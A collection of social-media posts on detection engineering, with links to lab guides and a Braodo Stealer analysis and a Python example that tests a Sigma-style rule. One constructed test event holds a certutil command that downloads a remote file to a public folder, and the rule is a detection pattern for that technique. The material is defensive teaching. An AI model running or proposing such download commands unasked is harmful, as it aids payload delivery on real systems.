How to create a detection engineering lab:
- Part 1:
https://medium.com/@bastradamus/how-to-create-a-detection-engineering-lab-part-1-8dacc52001b5
- Part 2:
https://medium.com/@bastradamus/how-to-create-a-detection-engineering-lab-part-2-3bdbb2c873d6
Applying Test-Driven Development to Detection Engineering: https://medium.com/@matterpreter/applying-test-driven-development-to-detection-engineering-b2e1d91a6563
Information Stealer malware remains one of the most active and dangerous threats in the wild. In this blog, the #Splunk Threat Research Team (#STRT) dives into Braodo Stealer, a Python-based malware designed to steal sensitive information while leveraging a popular developer platform to distribute its payload. We’ve analyzed its tactics, techniques, and procedures (TTPs) and shared the detection strategies we developed to combat this threat. Additionally, we took a closer look at its batch script loader, which employs layered obfuscation to complicate analysis and reverse engineering. To counter this, we created a custom Python de-obfuscation tool, which we detail in this post. #reverseengineering #blueteam #detectionengineering #incidentresponse #splunk #malwareanalysis
de-obfuscator tool:
https://lnkd.in/du2n7Gh8
Braodo Stealer Blog:
https://lnkd.in/d6bZ5AAX
Mapping my threat model onto the SIEM logs. Which ones are directly useful, which ones can be used for correlation?
You can hazard a good guess from the source types and index names. Next job is to validate assumptions with SOC.
If you wanted to help someone go zero to hero as a detection engineer what resources would you recommend?
Have you been keeping up with your low confidence detections? - https://detect.fyi/have-you-been-keeping-up-with-your-low-confidence-detections-494c742202e4
I'm back, but less newbish (I think). Still no mentor though. Still interested in #dfir and looking to pivot towards #detectionengineering.
Coming soon: short article of my opinion on how to write clean KQL for Analytic Rules.
An awesome overview of all the LOL and GTFO stuff. Even if some of it is well known, it's a good overview.
#detectionengineering enables collaborative outsourcing. Not all internal or all outsourced is the sweet spot.
Visibility (metrics) without actionability is a waste of time.
Concept of “Detection Surface”
Make sure that detection, investigation, and response are iterative (with a #detectionengineering cycle) and break the silo between the content team and the investigators/analysts.
Framing #detectionengineering as a way to introduce #secop into Agile development, to address the team and talent challenge:
1) Build a system to develop emerging practitioners (mitigate vendors stealing your talent, to avoid L1 analyst stagnation).
https://www.linkedin.com/in/hackerxbella/ is kicking off the conference!
Might be about #detectionengineering but we'll see #mitre
Next up here at #hacklu2024 is Thomas Patzke talking about 8 years of #SIGMA development.
SigmaHQ Essentials: Building Robust Detection Capabilities
- Part 1: https://blog.reconinfosec.com/sigmahq-essentials-building-robust-detection-capabilities
- Part 2: https://blog.reconinfosec.com/sigmahq-essentials_-building-robust-detection-capabilities-part-2
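The TDD-for-detection article linked above and the SigmaHQ series share one workflow: write the cases a rule must and must not fire on first, then shape the rule until every case passes. The block below is an added example, not code from either article, from SigmaHQ or from pySigma: a small evaluator for a subset of Sigma's detection syntax (field|modifier clauses, list values with `|all`, and a "selection and not filter" condition), a hypothetical certutil download rule, and constructed process-creation events with the verdict each one is expected to produce. The rule, the `patch_agent.exe` allowlist, and every event are made up for the demonstration.

```python
"""Test-driven detection with a Sigma-style rule.

Added example (not code from the linked articles, SigmaHQ or pySigma):
a small evaluator for a subset of Sigma's detection syntax, a hypothetical
rule, and constructed process-creation events with the verdict each one
is expected to produce. The expected verdicts are written first and the
rule is then adjusted until every case passes, which is the TDD loop
applied to detection content.
"""
import fnmatch

# Hypothetical rule. Supported subset: named blocks of field|modifier: value
# pairs and a condition of the form "X" or "X and not Y [and not Z ...]".
RULE = {
    "title": "Suspicious certutil download (hypothetical example rule)",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection": {
            "Image|endswith": "\\certutil.exe",
            "CommandLine|contains|all": ["-urlcache", "http"],
        },
        # Assumed allowlist: a fictitious patch agent that legitimately
        # downloads with certutil in this environment.
        "filter_updater": {"ParentImage|endswith": "\\patch_agent.exe"},
        "condition": "selection and not filter_updater",
    },
}


def _match_value(value, pattern, modifiers):
    """Match one field value against one pattern, Sigma-style (case-insensitive)."""
    if value is None:
        return False
    v, p = str(value).lower(), str(pattern).lower()
    if "contains" in modifiers:
        return p in v
    if "endswith" in modifiers:
        return v.endswith(p)
    if "startswith" in modifiers:
        return v.startswith(p)
    return fnmatch.fnmatchcase(v, p)  # plain values: * and ? are wildcards


def _match_field(event, key, patterns):
    """'Field|mod|mod' against a value or list; lists are ORed unless |all."""
    field, *modifiers = key.split("|")
    if not isinstance(patterns, list):
        patterns = [patterns]
    hits = [_match_value(event.get(field), p, modifiers) for p in patterns]
    return all(hits) if "all" in modifiers else any(hits)


def _match_block(event, block):
    """All field clauses inside one block are ANDed together."""
    return all(_match_field(event, k, v) for k, v in block.items())


def evaluate(rule, event):
    """True if the event satisfies the rule's condition."""
    det = rule["detection"]
    positive, _, negatives = det["condition"].partition(" and not ")
    if not _match_block(event, det[positive.strip()]):
        return False
    excluded = [n.strip() for n in negatives.split(" and not ") if n.strip()]
    return not any(_match_block(event, det[n]) for n in excluded)


# Constructed sample events (not real telemetry); 198.51.100.0/24 is a
# documentation range. Each case carries the verdict the rule must give.
TEST_CASES = [
    ("true_positive", True, {
        "Image": "C:\\Windows\\System32\\certutil.exe",
        "CommandLine": "certutil.exe -urlcache -split -f http://198.51.100.7/p.txt C:\\Users\\Public\\p.txt",
        "ParentImage": "C:\\Windows\\System32\\cmd.exe"}),
    ("benign_cert_store_dump", False, {
        "Image": "C:\\Windows\\System32\\certutil.exe",
        "CommandLine": "certutil.exe -store My",
        "ParentImage": "C:\\Windows\\System32\\cmd.exe"}),
    ("allowlisted_updater", False, {
        "Image": "C:\\Windows\\System32\\certutil.exe",
        "CommandLine": "certutil.exe -urlcache -f http://updates.example.invalid/manifest",
        "ParentImage": "C:\\Program Files\\Vendor\\patch_agent.exe"}),
    ("other_binary_same_args", False, {
        "Image": "C:\\Windows\\System32\\cmd.exe",
        "CommandLine": "cmd.exe /c echo -urlcache http",
        "ParentImage": "C:\\Windows\\explorer.exe"}),
]


def run_detection_tests(rule=RULE, cases=TEST_CASES):
    """Return the names of cases whose verdict differs from the expected one."""
    return [name for name, expected, event in cases
            if evaluate(rule, event) is not expected]


if __name__ == "__main__":
    failures = run_detection_tests()
    print("all detection tests passed" if not failures else f"FAILED: {failures}")
```

The loop in practice: when a new false positive shows up in production, add it to `TEST_CASES` with an expected `False` first, watch the test fail, then add the narrowest filter that makes it pass without breaking the true-positive case. The evaluator here is deliberately a toy subset; for real rules the SigmaHQ tooling (sigma-cli / pySigma) compiles the YAML to your SIEM's query language, and the same constructed events can be replayed against the compiled query as the acceptance test.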
PSA: if you are doing anything SOC, and you haven’t listened to #DCPthepodcast, you’re missing out.
I am not sure you can do SOC stuff right without listening to this podcast…